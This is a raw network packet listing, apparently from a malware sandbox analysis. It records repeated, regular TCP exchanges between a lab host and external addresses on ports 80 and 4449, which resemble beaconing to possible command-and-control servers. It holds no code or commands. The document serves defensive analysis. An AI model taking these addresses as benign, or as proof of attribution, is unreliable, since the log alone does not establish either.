                                                                          Jan 7, 2025 06:12:06.984260082 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.984270096 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.984277964 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.984282017 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.984292984 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.984302998 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.984304905 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.984314919 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.984323978 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.984333992 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.984354019 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:07.037458897 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:09.908525944 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:12:09.913336992 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:12:09.913410902 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:12:09.925188065 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:12:09.930017948 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:12:10.566098928 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:12:10.571580887 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:12:10.576354027 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:12:10.764403105 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:12:10.805056095 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:12:13.361849070 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:12:13.366710901 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:12:13.366765976 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:12:13.371546984 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:12:27.794028997 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:12:27.798937082 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:12:27.799035072 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:12:27.803951025 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:12:28.070111990 CET5249053192.168.2.6162.159.36.2
                                                                          Jan 7, 2025 06:12:28.075033903 CET5352490162.159.36.2192.168.2.6
                                                                          Jan 7, 2025 06:12:28.075124979 CET5249053192.168.2.6162.159.36.2
                                                                          Jan 7, 2025 06:12:28.079991102 CET5352490162.159.36.2192.168.2.6
                                                                          Jan 7, 2025 06:12:28.129513025 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:12:28.180025101 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:12:28.268197060 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:12:28.275866985 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:12:28.280827999 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:12:28.280945063 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:12:28.285913944 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:12:28.540817976 CET5249053192.168.2.6162.159.36.2
                                                                          Jan 7, 2025 06:12:28.545811892 CET5352490162.159.36.2192.168.2.6
                                                                          Jan 7, 2025 06:12:28.545869112 CET5249053192.168.2.6162.159.36.2
                                                                          Jan 7, 2025 06:12:42.227643967 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:12:42.232508898 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:12:42.232577085 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:12:42.237317085 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:12:42.563510895 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:12:42.617588997 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:12:42.705841064 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:12:42.707825899 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:12:42.712727070 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:12:42.712793112 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:12:42.717645884 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:12:56.664753914 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:12:56.669684887 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:12:56.669742107 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:12:56.674551010 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:12:56.998640060 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:12:57.039340973 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:12:57.143363953 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:12:57.145193100 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:12:57.149997950 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:12:57.150068045 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:12:57.154910088 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:11.102200031 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:11.106950045 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:11.107023954 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:11.111745119 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:11.435281992 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:11.476808071 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:11.581228971 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:11.582787037 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:11.587682962 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:11.587778091 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:11.592593908 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:20.170135021 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:20.175057888 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:20.176870108 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:20.181751013 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:20.509356022 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:20.554905891 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:20.659540892 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:20.661082983 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:20.665930986 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:20.668895960 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:20.673690081 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:22.477346897 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:22.482218027 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:22.482316971 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:22.487165928 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:22.821506977 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:22.864249945 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:22.972105026 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:22.990385056 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:22.995237112 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:22.995285034 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:23.000117064 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:24.260848045 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:24.265729904 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:24.265917063 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:24.270730019 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:24.602042913 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:24.661761999 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:24.753528118 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:24.755354881 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:24.760361910 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:24.760416031 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:24.765495062 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:26.649291992 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:26.654953957 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:26.654999971 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:26.660868883 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:26.992230892 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:27.072426081 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:27.143999100 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:27.145752907 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:27.150576115 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:27.150624990 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:27.155476093 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:29.320859909 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:29.325802088 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:29.325890064 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:29.330697060 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:29.853383064 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:29.853471041 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:29.853575945 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:29.856813908 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:29.861593008 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:29.861668110 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:29.866503954 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:31.367904902 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:31.372706890 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:31.372762918 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:31.377614021 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:31.703038931 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:31.847377062 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:31.848134995 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:31.851145029 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:31.855998993 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:31.856148958 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:31.860981941 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:33.070833921 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:33.075697899 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:33.075792074 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:33.080656052 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:33.404077053 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:33.540923119 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:33.550309896 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:33.551789999 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:33.556549072 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:33.556694031 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:33.561554909 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:38.743216038 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:38.804459095 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:38.804523945 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:38.809571981 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:39.136993885 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:39.242448092 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:39.388292074 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:39.389791965 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:39.394622087 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:39.394695044 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:39.399523020 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:41.774785995 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:41.779680967 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:41.779793024 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:41.784590006 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:41.918778896 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:41.923671007 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:41.923871040 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:41.928697109 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:42.105942011 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:42.202518940 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:42.202596903 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:42.206789017 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:42.211770058 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:42.211951017 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:42.216926098 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:42.347738028 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:42.350778103 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:42.355784893 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:42.355885029 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:42.360766888 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:56.354768991 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:56.359615088 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:56.359877110 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:56.364646912 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:56.695853949 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:56.831810951 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:56.831901073 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:56.924535990 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:56.929459095 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:13:56.929516077 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:13:56.934360981 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:06.852334976 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:14:06.857337952 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:06.857387066 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:14:06.862237930 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:07.194107056 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:07.257910013 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:14:07.332086086 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:07.334539890 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:14:07.339339972 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:07.339404106 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:14:07.344192982 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:09.930345058 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:14:09.935273886 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:09.935334921 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:14:09.940130949 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:10.272955894 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:10.410063982 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:10.410139084 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:14:10.411632061 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:14:10.416369915 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:10.416429043 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:14:10.421236038 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:24.367692947 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:14:24.372649908 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:24.372731924 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:14:24.377492905 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:24.709446907 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:24.757893085 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:14:24.848618984 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:24.850162983 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:14:24.854959965 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:24.858789921 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:14:24.863568068 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:27.774789095 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:14:27.779824018 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:27.779890060 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:14:27.784671068 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:28.114919901 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:28.195389986 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:14:28.254904032 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:28.256586075 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:14:28.261362076 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:28.261425972 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:14:28.266254902 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:41.820769072 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:14:41.825731993 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:41.825784922 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:14:41.830574989 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:42.164364100 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:42.210967064 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:14:42.301786900 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:42.303126097 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:14:42.308005095 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:42.308069944 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:14:42.312913895 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:54.617608070 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:14:54.622545958 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:54.622626066 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:14:54.627470970 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:54.958328962 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:55.008071899 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:14:55.099211931 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:55.100672960 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:14:55.106488943 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:14:55.106597900 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:14:55.111424923 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:09.054970980 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:15:09.059915066 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:09.059973955 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:15:09.064800024 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:09.392889977 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:09.539053917 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:15:09.541774035 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:09.543154001 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:15:09.547899008 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:09.547947884 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:15:09.552702904 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:19.320743084 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:15:19.325653076 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:19.325784922 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:15:19.330533981 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:19.651179075 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:19.697640896 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:15:19.792413950 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:19.794774055 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:15:19.799585104 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:19.799679041 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:15:19.805449963 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:21.117567062 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:15:21.429718971 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:15:21.607891083 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:21.607908964 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:21.795778990 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:21.851543903 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:15:21.932615042 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:21.934622049 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:15:21.939402103 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:21.939445019 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:15:21.944318056 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:23.308618069 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:15:23.313402891 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:23.316704988 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:15:23.321543932 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:23.650151014 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:23.697758913 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:15:23.808018923 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:23.809715986 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:15:23.814743042 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:23.814789057 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:15:23.819597006 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:37.732754946 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:15:37.737673998 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:37.737744093 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:15:37.742579937 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:38.068250895 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:38.117168903 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:15:38.214286089 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:38.215949059 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:15:38.220762968 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:38.220828056 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:15:38.225636959 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:44.055012941 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:15:44.061392069 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:44.061455011 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:15:44.067737103 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:44.394542933 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:44.518940926 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:15:44.542287111 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:44.543644905 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:15:44.548466921 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:44.548537970 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:15:44.553380013 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:50.383179903 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:15:50.388011932 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:50.388101101 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:15:50.392925978 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:50.721498013 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:50.870592117 CET44494974294.130.22.61192.168.2.6
                                                                          Jan 7, 2025 06:15:50.874778032 CET497424449192.168.2.694.130.22.61
                                                                          Jan 7, 2025 06:15:50.876132011 CET497424449192.168.2.694.130.22.61
